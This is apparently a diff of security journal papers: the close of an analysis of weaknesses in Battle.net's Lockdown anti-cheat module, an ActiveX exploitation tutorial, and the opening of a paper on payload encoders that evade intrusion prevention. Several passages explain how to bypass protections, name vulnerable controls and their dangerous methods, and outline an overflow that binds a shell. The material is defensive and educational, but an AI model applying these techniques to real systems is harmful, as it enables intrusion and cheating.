the hardcoded restrictions on module base addresses, and import table or code
|
||||
patch style hooks on the GetModuleHandleA API in order to defeat the secondary
|
||||
check on the module base address for the main executable image.
|
||||
|
||||
Another approach would be to simply create the main executable image as a
|
||||
process, suspended, and then either create a new thread in the process or
|
||||
assume control of the initial thread in order to execute the Lockdown module.
|
||||
This gets the would-be attacker out of having to patch checks in the module, as
|
||||
there is currently no defense against this case implemented in the module.
|
||||
|
||||
In order to strengthen this protection mechanism, the following approaches
|
||||
could be taken:
|
||||
|
||||
1. Manually traverse the loaded module list (and examine the PEB) in order to
|
||||
validate that the main process image is really at 0x00400000. All of these
|
||||
mechanisms could be compromised, but checking each one creates additional
|
||||
work for an attacker.
|
||||
2. Verify that the game has initialized itself to some extent. This would
|
||||
make the approach of creating the game process suspended more difficult. It
|
||||
would also otherwise make the use of the Lockdown module in an untrusted
|
||||
process more difficult without tricking the module into believing that it is
|
||||
running in an initialized game process. The scope of determining how the
|
||||
game is initialized is outside of this paper, although an approach similar
|
||||
to the current one based on a checksum of Storm video memory (though with
|
||||
more "redundancy", or an additional matrix of requirements for a legitimate
|
||||
game process) could be used.
|
||||
|
||||
3.4) Minor Functional Differences Between Lockdown Module Flavors
|
||||
|
||||
Presently, an attacker needs to implement all flavors of the Lockdown module
|
||||
in order to be assured of a successful connection to Battle.net. However,
|
||||
even with the 20 possibilities now available, this is still not difficult due
|
||||
to the minor functional differences between the different Lockdown flavors.
|
||||
Moreover, it is trivially possible to find the "magic" constants that constitute
|
||||
the only functional differences between each flavor of Lockdown.
|
||||
|
||||
In the author's tests, two pattern matches and a small 200-line C program were
|
||||
all that were necessary to programmatically identify all of the magical
|
||||
constants that represent the functional differences between each flavor of
|
||||
Lockdown module, in a completely automated fashion. In fact, the author would
|
||||
wager that it took more time to implement all 20 different flavors of Lockdown
|
||||
modules than it took to devise and implement a rudimentary pattern matching
|
||||
system to automagically discover all 20 magical constants from the set of 20
|
||||
Lockdown module flavors. Clearly, this is not desirable from the standpoint
|
||||
of effort put in to the protection scheme vs difficulty in attacking it.
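
To give a sense of how little work such a pattern matcher involves, here is a minimal sketch in Python. The byte signature (a `push imm32' followed by a `call rel32') is purely hypothetical and is not the pattern used in the author's tests; the point is only that one wildcarded signature, once found by hand in a single flavor, can be applied to every other flavor automatically.

```python
import re

# Hypothetical signature: opcode 0x68 (push imm32), four wildcard bytes
# holding the constant, then opcode 0xE8 (call rel32).
CONSTANT_PATTERN = re.compile(rb"\x68(.{4})\xe8", re.DOTALL)


def extract_constant(module_bytes):
    """Return the first matching 32-bit little-endian constant, or None."""
    match = CONSTANT_PATTERN.search(module_bytes)
    if match is None:
        return None
    return int.from_bytes(match.group(1), "little")


def extract_all(modules):
    """Map each module name to its extracted constant."""
    return {name: extract_constant(data) for name, data in modules.items()}
```

Superficial differences such as reordered functions do not affect a search of this kind, since the signature is located by content rather than by offset.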
|
||||
|
||||
In order to address these weaknesses, the following steps could be implemented:
|
||||
|
||||
1. Implement true, major functional differences between Lockdown flavors.
|
||||
Instead of using a single constant value that is different between each
|
||||
flavor (probably a "" preprocessor constant), implement other,
|
||||
real functional differences. Otherwise, even with a number of different
|
||||
"non-functional" differences between module flavors, a pattern-matching
|
||||
system will be able to quickly locate the different constants for each
|
||||
module after a human attacker has discovered the constant for at least one
|
||||
module flavor.
|
||||
2. Avoid using quick-to-substitute constants as the "meat" of the functional
|
||||
differences between flavors. While these are convenient from a development
|
||||
perspective, they are also convenient from an attacker perspective. If a
|
||||
bit more time were spent from a development perspective, attackers could be
|
||||
made to do real analysis of each module separately in order to determine the
|
||||
actual functional differences, greatly increasing the amount of time that is
|
||||
required for an attacker to defeat this protection scheme.
|
||||
|
||||
3.5) Spoofed Return Address for CheckRevision Calls
|
||||
|
||||
Due to how the x86 architecture works, it is trivially easy to spoof the return
|
||||
address pointer for a procedure call. All that one must do is push the spoofed
|
||||
return address on the stack, and then immediately execute a direct jump to the
|
||||
target procedure (as opposed to a standard call).
|
||||
|
||||
As a result, it is fairly trivial to bypass this protection mechanism at
|
||||
run-time. One need only search for a `ret' opcode in the code space of the
|
||||
Battle.snp module in memory, and use the technique described previously to
|
||||
simply "bounce" the call off of Battle.snp via the use of a spoofed return
|
||||
address. To the Lockdown module, the call will appear to originate from the
|
||||
context of Battle.snp, but in reality the call will immediately return from
|
||||
Battle.snp to the real caller in the untrusted process.
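
The bounce can be modelled with a simulated stack. The sketch below is an illustration under stated assumptions: the code bytes and addresses are made up, arguments are represented by placeholder zeros, and a stdcall-style callee that removes its own arguments is assumed.

```python
RET_OPCODE = 0xC3  # x86 near return


def find_ret_address(code, code_base):
    """Return the address of the first 0xC3 byte in the code, or None."""
    offset = code.find(bytes([RET_OPCODE]))
    return None if offset < 0 else code_base + offset


def simulate_bounced_call(real_return, gadget, arg_count):
    """Model the stack for a jump into the callee with a spoofed return.

    Returns (address the callee sees as its caller, final resume address).
    """
    stack = [real_return]        # consumed later by the gadget's `ret'
    stack += [0] * arg_count     # placeholder arguments for the callee
    stack.append(gadget)         # spoofed return address, top of stack
    seen_by_callee = stack[-1]   # what a return-address check inspects
    stack.pop()                  # callee's `ret N' pops the return address
    del stack[len(stack) - arg_count:]  # ...and discards its arguments
    resume_at = stack.pop()      # the gadget's `ret' pops the real caller
    return seen_by_callee, resume_at
```

The callee only ever observes the gadget address, which lies inside the trusted module, while control ultimately resumes at the real caller.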
|
||||
|
||||
To counter this, the following could be attempted:
|
||||
|
||||
1. Verify two return addresses deep, although due to the nature of the x86
|
||||
calling conventions (at least stdcall and fastcall, the two used by
|
||||
Blizzard code frequently), it is not guaranteed that four bytes past the
|
||||
return address will be a particularly meaningful value.
|
||||
2. Verify that the return address does not point directly to a `ret', `jmp',
|
||||
`call' or similar instruction, assuming that current Battle.snp variations do
|
||||
not use such patterns in their call to the module. This only slightly raises
|
||||
the bar for an attacker, though; he or she would only need pick a more
|
||||
specific location in Battle.snp through which to stage a call, such as the
|
||||
actual location used in normal calls to the Lockdown module.
|
||||
|
||||
3.6) Limited Pool of Challenge/Response Tuples
|
||||
|
||||
Presently, the Battle.net servers contain a fairly limited pool of possible
|
||||
challenge/response pairs for the version check and authentication system.
|
||||
Observations suggest that most products have a pool of around one thousand
|
||||
values that can be sent to clients. This has been used against Battle.net in
|
||||
the past, which was countered by an increase to 20000 possible values for
|
||||
several Battle.net products. Even with 20000 possible values, though, it is
|
||||
still possible to capture a large number of logon attempts over time and build
|
||||
a lookup table of possible values. This is an attractive option for an
|
||||
attacker, as he or she need only perform passive analysis over a period of time
|
||||
in order to construct a database capable of logging on to Battle.net with a
|
||||
fairly high success rate. Given the relative infrequency of updates to the
|
||||
pool of version check values (typically once per patch), this is considered to
|
||||
be a fairly viable method for an attacker to bypass the version check and
|
||||
authentication system.
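
The effectiveness of a passively built lookup table can be estimated with a short calculation. The sketch below assumes that the server draws challenges uniformly at random from the pool, which is an assumption made for illustration and not something the author has verified.

```python
import math


def expected_coverage(pool_size, observations):
    """Expected fraction of the pool seen after a number of observed logons."""
    return 1.0 - (1.0 - 1.0 / pool_size) ** observations


def observations_for_coverage(pool_size, target):
    """Smallest number of observed logons whose expected coverage >= target."""
    return math.ceil(math.log(1.0 - target) / math.log(1.0 - 1.0 / pool_size))
```

Under that assumption, observing as many logons as there are pool entries yields roughly 63% coverage (about 1 - 1/e), and a few multiples of the pool size bring the table close to complete.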
|
||||
|
||||
This limitation could easily be addressed by Blizzard, however, such as through
|
||||
the implementation of one or more of the below suggestions:
|
||||
|
||||
1. Periodically rotate the set of possible version check values so as to ensure
|
||||
that a database of challenge/response pairs would quickly expire and need to
|
||||
be rebuilt. Combined with a large pool of possible values, this approach
|
||||
would greatly reduce the practicality of this attack. Unfortunately, the
|
||||
author suspects that this would require manual intervention each time the
|
||||
pools were to be rotated on the part of Blizzard in the current Battle.net
|
||||
server implementation.
|
||||
2. Implement dynamic generation of pool values at runtime on each Battle.net
|
||||
server. This would require the server to have access to the requisite client
|
||||
binaries, but is not expected to be a major challenge (especially since the
|
||||
author suspects that Battle.net is powered by Windows already, which would
|
||||
allow the existing Lockdown module code to be cleaned up and repackaged for
|
||||
use on the server as well). This could be implemented as a pool of possible
|
||||
values that is simply stirred every so often; new challenge/response values
|
||||
need not necessarily be generated on each logon attempt (and doing so would
|
||||
have undesirable performance implications in any case).
|
||||
|
||||
4) Conclusion
|
||||
|
||||
Although the Lockdown module and associated authentication system represent
|
||||
a major break in Blizzard's ongoing battle against non-genuine Battle.net
|
||||
client software, there are still many improvements that could be made in a
|
||||
future release of the version check and authentication system which would fit
|
||||
within the constraints imposed on the version check system, and still pose a
|
||||
significant challenge to an adversary attempting to spoof Battle.net logons
|
||||
using non-genuine clients. The author would encourage Blizzard to consider
|
||||
and implement enhancements akin to those described in this paper, particularly
|
||||
protections that overlap and complement each other (such as the debug register
|
||||
clearing and memory checksum schemes).
|
||||
|
||||
In the vein of improving the Lockdown system, the author would like to stress
|
||||
the following principles as especially important in creating a system that is
|
||||
difficult to defeat and yet still workable and viable from a development and
|
||||
deployment perspective:
|
||||
|
||||
- Defense in depth with respect to the various protection mechanisms in place
|
||||
within the module is a must. Protection systems need to be designed to
|
||||
complement and reinforce each other, such that an attacker must defeat a
|
||||
number of layers of protection schemes for any one significant attack to
|
||||
succeed to the point of being a break in the system.
|
||||
|
||||
- Countermeasures intended to frustrate reverse engineering or easy duplication
|
||||
of critical algorithms need to be viewed in the light of what an adversary
|
||||
might do in order to 'attack' (or duplicate, re-implement, or whatnot) a
|
||||
'guarded' (or otherwise important) algorithm or section of code. For
|
||||
example, an attacker could ease the work of reimplementing parts of an
|
||||
algorithm or function of interest by wholesale copying of assembler code
|
||||
into a different module, or by loading an "authentic" module and making
|
||||
direct calls into internal functions (or the middle of internal functions) in
|
||||
an effort to bypass "upstream" protection checks. Keeping with this line of
|
||||
thinking, it would be advisable to interleave protection checks with code
|
||||
that performs actual useful work to a certain degree, such that it is less
|
||||
trivial for an adversary to bypass protection checks that are entirely done
|
||||
"up front" (leaving the remainder of a secret algorithm or function
|
||||
relatively "vulnerable", if the check code is skipped entirely).
|
||||
|
||||
- Countermeasures intended to create "time sinks" for an adversary need to be
|
||||
carefully designed such that they are not easily bypassed. For instance, in
|
||||
the current Lockdown module implementation, there are twenty flavors of the
|
||||
Lockdown module; yet, in this implementation, it is trivially easy for an
|
||||
adversary to discover the differences (in a largely programmatic fashion),
|
||||
making this "time sink" highly ineffective, as the time for an adversary to
|
||||
breach it is likely much less than the time for the original developers to
|
||||
have created it.
|
||||
|
||||
- Measures that depend on external, imported APIs are often relatively easy for
|
||||
an attacker to quickly pinpoint and disable (for example, the method by which
|
||||
debug register breakpoints are disabled by the Lockdown module is
|
||||
immediately obvious to an adversary, if they are even the least bit familiar
|
||||
with the Win32 API, which must be assumed). In some cases (such as with the
|
||||
debug register breakpoint clearing code), this cannot be avoided, but in
|
||||
others (such as validation of module base addresses), the same effect could
|
||||
be potentially implemented by use of less-obvious approaches (for example
|
||||
manually traversing the loaded module list by locating the PEB and the
|
||||
loader data structures from the backlink pointer in the current thread's
|
||||
TEB). The author would encourage the developers of additional defensive
|
||||
measures to reduce dependencies on easily-noticeable external APIs as much as
|
||||
possible (balanced, of course, against the need for maintainable code that
|
||||
executes on all supported platforms). In some instances, such as the manual
|
||||
resolution of Storm symbols, the current system does do a fair job of
|
||||
avoiding easily-detectable external API use.
|
||||
|
||||
All things considered, the Lockdown system represents a major step forward in
|
||||
the vein of guarding Battle.net from unauthorized clients. Even so, there is
|
||||
still plenty of room for improvements in potential future revisions of the
|
||||
system. The author hopes that this article may prove useful in the
|
||||
strengthening of future defensive systems, by virtue of a thorough accounting
|
||||
of the strengths and weaknesses in the current Lockdown module (and pointed
|
||||
suggestions as to how to repair certain weaker mechanisms in the current
|
||||
implementation).
|
297
uninformed/9.2.txt
Normal file
|
@ -0,0 +1,297 @@
|
|||
ActiveX - Active Exploitation
|
||||
01/2008
|
||||
warlord
|
||||
warlord@nologin.org
|
||||
http://www.nologin.org
|
||||
|
||||
Share what I know, learn what I don't
|
||||
|
||||
1) Foreword
|
||||
|
||||
First of all, I'd like to explain what this paper is all about, and
|
||||
especially, what it is not. A few months ago I got into the technical details
|
||||
of ActiveX for the first time. Prior to this point I only had some vague
|
||||
ideas and a general understanding of what it is and how it works. What I did
|
||||
first is probably quite obvious: I googled. To my surprise though, I could
|
||||
not find a single paper discussing ActiveX and how to exploit it. My next step
|
||||
was to contact some generally smart and knowledgeable friends to harvest the
|
||||
required information from them. I was even more surprised to find that some of
|
||||
the most skilled people out there lacked the same knowledge that I did.
|
||||
Perhaps it's our common background, coming from the Unix/Linux world, but
|
||||
whatever the reason, I had to work to collect the information I now possess.
|
||||
But still, I feel like I'm the one-eyed man explaining what the world looks
|
||||
like to the blind.
|
||||
|
||||
There are tons of ActiveX exploits on Milw0rm, which would
|
||||
suggest that the knowledge is out there by now. I wonder why no one took the
|
||||
time to write it all up so the less knowledgeable may get into this theater as
|
||||
well. It's the intention of this paper to fill this gap. If you already know
|
||||
everything about ActiveX, if you've found your own 0day and exploited it
|
||||
successfully, I probably can't teach you any new tricks. Everyone else I
|
||||
invite to read on.
|
||||
|
||||
2) Introduction
|
||||
|
||||
ActiveX[1] is a Microsoft technology introduced in 1996 and based on
|
||||
the Component Object Model (COM) and Object Linking and Embedding (OLE)
|
||||
technologies. The intention of COM has been to create easily reusable pieces of
|
||||
code by creating objects that offer interfaces which can be called by other
|
||||
COM objects or programs. This technology is widely used for what
|
||||
Microsoft calls ActiveX[2] which represents the integration of COM
|
||||
into Internet Explorer. This integration offers the ability to interface
|
||||
with Windows as well as third-party applications with the MS browser. This
|
||||
allows for the easy extension of functionality in the Internet Explorer by
|
||||
giving software developers the ability to create complex applications which
|
||||
can interface with websites through the browser.
|
||||
|
||||
There are various ways for an ActiveX control to end up on any given machine.
|
||||
Besides all the controls which are part of IE or the operating system,
|
||||
programs may install and register ActiveX controls of their own to offer a
|
||||
diverse set of functions in IE. Another way of installing a new control is
|
||||
through web sites themselves. Depending on Internet Explorer security
|
||||
settings, a website may try to instantiate a control, for example Shockwave
|
||||
Flash, and failing to do so may prompt the user to install the Shockwave Flash
|
||||
ActiveX control.
|
||||
|
||||
Security issues seem to be a constant problem with ActiveX controls.
|
||||
In fact, it seems most vulnerabilities in Windows nowadays are actually due to
|
||||
poorly-written third-party controls which allow malicious websites to exploit
|
||||
buffer overflows or abuse command injection vulnerabilities. Quite often
|
||||
these controls give the impression that their authors did not realize their
|
||||
code can be instantiated from a remote website.
|
||||
|
||||
The following chapters will describe methods to find, analyze, and exploit
|
||||
bugs in ActiveX controls.
|
||||
|
||||
3) Control and functionality enumeration
|
||||
|
||||
Any given Windows installation is likely to have a significant number of
|
||||
registered COM objects. For the purpose of this paper, however, we are only
|
||||
interested in controls which may be instantiated from a website. Quite a
|
||||
number of the following details are taken from the excellent "The Art
|
||||
of Software Security Assessment"[3], a book I strongly recommend to
|
||||
anyone interested in application security.
|
||||
|
||||
ActiveX controls are usually, but not always, instantiated by passing their
|
||||
CLSID to CoCreateInstance. The respective class identifier (CLSID) is used as
|
||||
a unique value which is associated with each control in order to distinguish
|
||||
it from its peers. A list of all the existing CLSIDs on a given Windows
|
||||
installation can be found in the registry in HKEY_CLASSES_ROOT\CLSID, which
|
||||
actually is nothing but an alias to HKEY_LOCAL_MACHINE\Software\Classes\CLSID.
|
||||
|
||||
Within the CLSID key there are thousands of different class identifiers, all
|
||||
of them specifying ActiveX controls. However, only a subset of those can be
|
||||
instantiated by a website. Controls marked as safe for scripting are granted
|
||||
this ability. To determine whether a certain control has this ability, it has
|
||||
to be part of the respective category. Specifically, the category can be
|
||||
found in the registry in the form: HKEY_CLASSES_ROOT\CLSID\<control
|
||||
clsid>\Implemented Categories. If a control is safe for scripting it may
|
||||
indicate this by having a subkey with the GUID
|
||||
7DD95801-9882-11CF-9FA9-00AA006C42C4. Similarly, the 'safe for initialization'
|
||||
category is listed in the same location, but with a slightly different GUID.
|
||||
Its value is 7DD95802-9882-11CF-9FA9-00AA006C42C4.
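
The category check described above can be sketched in Python. This is only
an illustration under stated assumptions: the function name
classify_categories is hypothetical, and the list of subkey names is assumed
to have been read beforehand from the control's Implemented Categories key
(on Windows, the standard winreg module could be used for that).

```python
# Category GUIDs quoted in the text above.
CATID_SAFE_FOR_SCRIPTING = "7DD95801-9882-11CF-9FA9-00AA006C42C4"
CATID_SAFE_FOR_INIT = "7DD95802-9882-11CF-9FA9-00AA006C42C4"


def classify_categories(subkey_names):
    """Report which 'safe' categories appear among the subkey names.

    subkey_names: names of the subkeys found under the control's
    'Implemented Categories' key (hypothetical input for this sketch).
    """
    # Registry key names are case-insensitive and usually wrapped in braces.
    normalized = {name.strip("{}").upper() for name in subkey_names}
    return {
        "safe_for_scripting": CATID_SAFE_FOR_SCRIPTING in normalized,
        "safe_for_initialization": CATID_SAFE_FOR_INIT in normalized,
    }
```

A negative result from this check is not conclusive, since a control may
still report itself as safe at run time.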
|
||||
|
||||
In the end though, not being part of these categories doesn't necessarily mean
|
||||
that a control cannot be called from IE. The component may dynamically report
|
||||
itself as being safe for scripting when it is instantiated through IE. The
|
||||
only surefire way is to try and instantiate a control and see if it can be
|
||||
used. Axman[5] is an ActiveX fuzzer written by HD Moore which can automate this
|
||||
check for all of the different CLSIDs on a system. Another tool to enumerate
|
||||
the controls in question is iDefense's ComRaider[4], another ActiveX fuzzer,
|
||||
which has the ability to build a database of controls that IE should be able
|
||||
to instantiate.
|
||||
|
||||
3.1) ProgIDs
|
||||
|
||||
Besides the long and rather hard to memorize CLSID there is often a second
|
||||
way of instantiating a certain control. This can be accomplished through the
|
||||
use of a control's program ID (progID). Quite similar to IP addresses and the
|
||||
Domain Name System (DNS), progIDs can be looked up to determine the matching
|
||||
CLSID. Once the right one has been determined, Internet Explorer goes on as
|
||||
if the CLSID had been provided in the first place.
|
||||
|
||||
For this technique to work for a given control, two requirements must be met.
|
||||
First, a control must have a ProgID subkey under its CLSID key in the
|
||||
registry. ProgIDs are usually in the form Program.Component.Version such as
|
||||
SafeWia.Script.1. Second, as there is no point for Windows to walk through up
|
||||
to 2700 CLSIDs (in my example) to find the specified ProgID, the program ID
|
||||
itself must have a key in HKEY_CLASSES_ROOT with a subkey named CLSID which
|
||||
makes the association.
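
The two requirements can be modelled with a toy lookup. In this sketch the
registry is replaced by a plain Python dict that maps key paths (relative to
HKEY_CLASSES_ROOT) to their default values. The function name resolve_progid
and the dict layout are assumptions made for illustration, and the
comparison is case-sensitive, unlike the real registry.

```python
def resolve_progid(hkcr, progid):
    """Return the CLSID registered for progid, or None.

    hkcr: dict mapping key paths relative to HKEY_CLASSES_ROOT to their
    default values (a stand-in for the real registry).
    """
    # Second requirement: <ProgID>\CLSID makes the association.
    clsid = hkcr.get(progid + "\\CLSID")
    if clsid is None:
        return None
    # First requirement: the CLSID key names the ProgID in turn.
    if hkcr.get("CLSID\\" + clsid + "\\ProgID") != progid:
        return None
    return clsid
```

The cross-check of both keys mirrors the two requirements listed above. It
is not a claim about the exact order in which Windows reads them.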
|
||||
|
||||
3.2) The Kill Bit
|
||||
|
||||
In some cases it is desirable to restrict a control from ever being
|
||||
instantiated in IE. This can be accomplished through the use of a
|
||||
kill bit. The kill bit can be defined by setting the 0x00000400 bit
|
||||
in the Compatibility Flags DWORD associated with a given CLSID:
|
||||
|
||||
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\<CLSID>
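
Testing for the kill bit is a single mask operation. The sketch below
assumes the DWORD has already been read from the key shown above (the value
is assumed here to be the one named Compatibility Flags). The helper names
are hypothetical.

```python
KILL_BIT = 0x00000400


def is_killed(compat_flags):
    """Return True if the kill bit is set in the given DWORD value."""
    return bool(compat_flags & KILL_BIT)


def set_kill_bit(compat_flags):
    """Return the DWORD with the kill bit set, leaving other bits untouched."""
    return (compat_flags | KILL_BIT) & 0xFFFFFFFF
```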
|
||||
|
||||
3.3) User Specific Controls
|
||||
|
||||
With Windows XP, Microsoft introduced support for user-specific ActiveX
|
||||
controls. These do not require Administrator-level access to install because
|
||||
the controls are specific to a certain user, as the name already implies.
|
||||
These controls can be found under HKEY_CURRENT_USER\Software\Classes. While
|
||||
this functionality exists, most ActiveX controls are installed globally.
|
||||
|
||||
3.4) Determining Exported Functions
|
||||
|
||||
ActiveX controls implement various COM interfaces in the same manner as any
|
||||
other COM object. COM interfaces are well-defined definitions of what
|
||||
functions and properties a COM class must implement and support. COM provides
|
||||
the ability to dynamically query a COM class at runtime using QueryInterface
|
||||
to see what interfaces it implements. This is how IE determines if a control
|
||||
supports the safe for scripting interface (which is called IObjectSafety).
|
||||
|
||||
4) Examples
|
||||
|
||||
4.1) MW6 Technologies QRCode ActiveX 3.0
|
||||
|
||||
In this section the previously provided information will be demonstrated with
|
||||
the help of a recent public ActiveX vulnerability and exploit. The vulnerable
|
||||
control is from a company called MW6 and comes with their "QRCode ActiveX"
|
||||
version 3.0. When I downloaded the software in January 2008, several months
|
||||
after the exploit was posted on Milw0rm in September, the vulnerable control
|
||||
was still part of the package.
|
||||
|
||||
The control itself has a CLSID of 3BB56637-651D-4D1D-AFA4-C0506F57EAF8. After the
|
||||
installation of the software, it can be found in the registry in:
|
||||
|
||||
HKEY_CLASSES_ROOT\CLSID\{3BB56637-651D-4D1D-AFA4-C0506F57EAF8}
|
||||
|
||||
The DLL that implements this control can be found on the hard drive in the file
|
||||
that is specified in the "InprocServer32" key. In this example it is:
|
||||
|
||||
C:\WINDOWS\system32\MW6QRC~1.DLL
|
||||
|
||||
There are two interesting things to note here. For one, the ProgID key has a
|
||||
default value of MW6QRCode.QRCode.1. At the ProgID's corresponding location in
|
||||
the registry, namely HKCR\MW6QRCode.QRCode.1, the CLSID subkey contains the
|
||||
CLSID of that control. This tells us that this control can be instantiated
|
||||
using both its CLSID and ProgID. Another point of interest in the screenshot
|
||||
is the absence of the "Implemented Categories" key. This means that this
|
||||
control is neither part of the "safe for scripting" nor the "safe for
|
||||
initialization" category. However, it appears that the control must implement
|
||||
IObjectSafety since it is still possible to instantiate the control from IE.
|
||||
The following simple HTML code tries to instantiate the control.
|
||||
|
||||
<body>
|
||||
<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test'>
|
||||
</object>
|
||||
</body>
|
||||
|
||||
The result of this snippet of code is the appearance of a little picture in IE.
|
||||
As this works just fine without Internet Explorer complaining about being
|
||||
unable to load the control, the next examination step is in order.
|
||||
|
||||
4.1.1) Enumerating Exported Interfaces
|
||||
|
||||
By now it has been shown that the example control can be instantiated from IE
|
||||
just fine. The question now is what kind of interfaces the control provides to
|
||||
the caller. By submitting the specific CLSID of the control that is to be
|
||||
examined to ComRaider, the tool lists all of the control's implemented
|
||||
functions as well as the kind and number of expected parameters. An
|
||||
alternative to ComRaider is the so-called OLE-COM object viewer that comes
|
||||
with the platform SDK and Visual Studio.
|
||||
|
||||
4.1.2) Exploitation
|
||||
|
||||
After playing around with various functions, it soon becomes obvious that
|
||||
SaveAsBMP and SaveAsWMF happily accept any path provided to save the
|
||||
generated graphic in the specified location. This can make it possible to
|
||||
overwrite existing files with the picture if the user running IE has
|
||||
sufficient access. This is a perfect example of a program using untrusted
|
||||
data and operating on it without any kind of checks. It is likely that the
|
||||
control's author did not consider the security implications of what they were
|
||||
doing.
|
||||
|
||||
A sample exploit for this vulnerability, written by shinnai, can be found on
|
||||
Milw0rm: http://www.milw0rm.com/exploits/4420.
|
||||
|
||||
4.2) HP Info Center
|
||||
|
||||
On December 12th, 2007, a vulnerability in an ActiveX control which was
|
||||
shipped by default with multiple series of Hewlett Packard notebooks was
|
||||
disclosed. The issue itself was found in a piece of software called the HP
|
||||
Info Center. The vulnerability allowed remote read and write access to the
|
||||
registry as well as the execution of arbitrary commands. By instantiating
|
||||
this control in Internet Explorer and calling the vulnerable functions it was
|
||||
possible to run software with the same level of access as the user running IE.
|
||||
Porkythepig found and disclosed this serious threat and wrote a detailed
|
||||
report as well as a sample exploit covering three attack vectors.
|
||||
|
||||
The HP control with the CLSID 62DDEB79-15B2-41E3-8834-D3B80493887A was
|
||||
responsible for the listed vulnerabilities. By default it installs itself into
|
||||
C:\Program Files\Hewlett-Packard\HP Info Center. In his advisory, porky
|
||||
listed three potentially insecure methods as well as the expected parameters:
|
||||
|
||||
- VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
|
||||
- void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
|
||||
- void LaunchApp(String appPath, String params, int cmdShow);
|
||||
|
||||
While the first and second method allow for remote read and write access to
|
||||
the registry, the third function runs arbitrary programs. For example, an
|
||||
attacker could execute cmd.exe with arbitrary arguments.
|
||||
|
||||
In this example the vulnerable control provided remote access to the victim's
|
||||
machine. Sample code to exploit all three functions can once again be found on
|
||||
Milw0rm: http://www.milw0rm.com/exploits/4720.
|
||||
|
||||
4.3) Vantage Linguistics AnswerWorks
|
||||
|
||||
The third and last example of various ActiveX vulnerabilities is in the
|
||||
Vantage Linguistics AnswerWorks. Advisories covering this vulnerability were
|
||||
released in December, 2007. The awApi4.AnswerWorks.1 control exports several
|
||||
functions which are prone to stack-based buffer overflows. The functions
|
||||
GetHistory(), GetSeedQuery(), and SetSeedQuery() fail to properly handle long
|
||||
strings provided by a malicious website. The resulting stack-based buffer
|
||||
overflow allows for the execution of arbitrary code, as "e.b." demonstrates
|
||||
with a proof of concept that binds a shell to port 4444 when the exploit
|
||||
succeeds.
|
||||
|
||||
When the exploit is loaded from a webserver it instantiates the CLSID and links
|
||||
the created object to a variable named obj. It then calls the GetHistory()
|
||||
function with a carefully crafted string which consists of 214 A's to fill the
|
||||
buffer followed by a return address which overwrites the one saved on the
|
||||
stack. After those 4 bytes come 12 NOPs and then finally the shellcode. As
|
||||
one can easily see, this exploit is based on the same techniques that can be
|
||||
seen in many other stack-based exploits.
|
||||
|
||||
The exploit mentioned in this example can also be found on Milw0rm:
|
||||
http://www.milw0rm.com/exploits/4825.
|
||||
|
||||
5) Summary
|
||||
|
||||
This paper has provided a brief introduction to ActiveX. The focus has been
|
||||
on discussing some of the underlying technology and security related issues
|
||||
that can manifest themselves. This was meant to equip the reader with enough
|
||||
background knowledge to examine ActiveX controls from a security point of
|
||||
view. The author hopes he managed to describe the big picture in enough detail
|
||||
to provide readers with enough information on the matter to base further
|
||||
research on the acquired knowledge.
|
||||
|
||||
5.1) Acknowledgements
|
||||
|
||||
wastedimage - For answering the first questions
|
||||
deft - For providing lots of answers and examples
|
||||
rjohnson - For filling in details deft forgot to mention
|
||||
skape - For background knowledge on underlying functions
|
||||
hdm - For knowing all the rest
|
||||
|
||||
References
|
||||
|
||||
[1] ActiveX Controls @ Wikipedia
|
||||
http://en.wikipedia.org/wiki/ActiveXcontrol
|
||||
|
||||
[2] ActiveX Controls
|
||||
http://msdn2.microsoft.com/en-us/library/aa751968.aspx
|
||||
|
||||
[3] The Art of Software Security Assessment
|
||||
http://taossa.com
|
||||
|
||||
[4] ComRaider
|
||||
http://labs.idefense.com/software/fuzzing.php#morecomraider
|
||||
|
||||
[5] Axman ActiveX Fuzzer
|
||||
http://www.metasploit.com/users/hdm/tools/axman/
|
679
uninformed/9.3.txt
Normal file
|
@ -0,0 +1,679 @@
|
|||
Context-keyed Payload Encoding
|
||||
Preventing Payload Disclosure via Context
|
||||
October, 2007
|
||||
I)ruid, C²ISSP
|
||||
druid@caughq.org
|
||||
http://druid.caughq.org
|
||||
|
||||
Abstract
|
||||
|
||||
A common goal of payload encoders is to evade a third-party detection mechanism which
|
||||
is actively observing attack traffic somewhere along the route from an attacker
|
||||
to their target, filtering on commonly used payload instructions. The use of
|
||||
a payload encoder may be easily detected and blocked, and may also open up the
|
||||
opportunity for the payload to be decoded for further analysis. Even
|
||||
so-called keyed encoders utilize easily observable, recoverable, or guessable
|
||||
key values in their encoding algorithm, thus making decoding on-the-fly
|
||||
trivial once the encoding algorithm is identified. It is feasible that an
|
||||
active observer may make use of the inherent functionality of the decoder stub
|
||||
to decode the payload of a suspected exploit in order to inspect the contents
|
||||
of that payload and make a control decision about the network traffic. This
|
||||
paper presents a new method of keying an encoder which is based entirely on
|
||||
contextual information that is predictable or known about the target by the
|
||||
attacker and constructible or recoverable by the decoder stub when executed at
|
||||
the target. An active observer of the attack traffic however should be unable
|
||||
to decode the payload due to lack of the contextual keying information.
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
In the art of vulnerability exploitation there are often numerous hurdles that
|
||||
one must overcome. Examples of hurdles can be seen as barriers to traversing
|
||||
the attack vector and challenges with developing an effective vulnerability
|
||||
exploitation technique. A critical step in the latter inevitably requires the
|
||||
use of an exploit payload, traditionally referred to as shellcode. A payload
|
||||
is the functional exploit component that implements the exploit's purpose[1].
|
||||
|
||||
One barrier to successful exploitation may be that including certain byte
|
||||
values in the payload will not allow the payload to reach its destination in
|
||||
an executable form[2], or even at all. Another hurdle to overcome may be that an
|
||||
in-line network security monitoring device such as an Intrusion Prevention
|
||||
System (IPS) could be filtering network traffic for the particular payload
|
||||
that the exploit intends to deliver[3, 288-289], or otherwise extracting the
|
||||
payload for further automated analysis[4][5, 2]. Whatever the hurdle may be,
|
||||
many challenges relating to the payload portion of the exploit can be overcome
|
||||
by employing what is known as a payload encoder.
|
||||
|
||||
1.1) Payload Encoders
|
||||
|
||||
Payload encoders provide the utility of obfuscating the exploit's payload
|
||||
while it is in transit. Once the payload has reached its target, the payload
|
||||
is decoded prior to execution on the target system. This allows the
|
||||
payload to bypass various controls and restrictions of the type mentioned
|
||||
previously while still remaining in an executable form. In general, an
|
||||
exploit's payload will be encoded prior to packaging in the exploit itself
|
||||
and what is known as a decoder stub will be prepended to the
|
||||
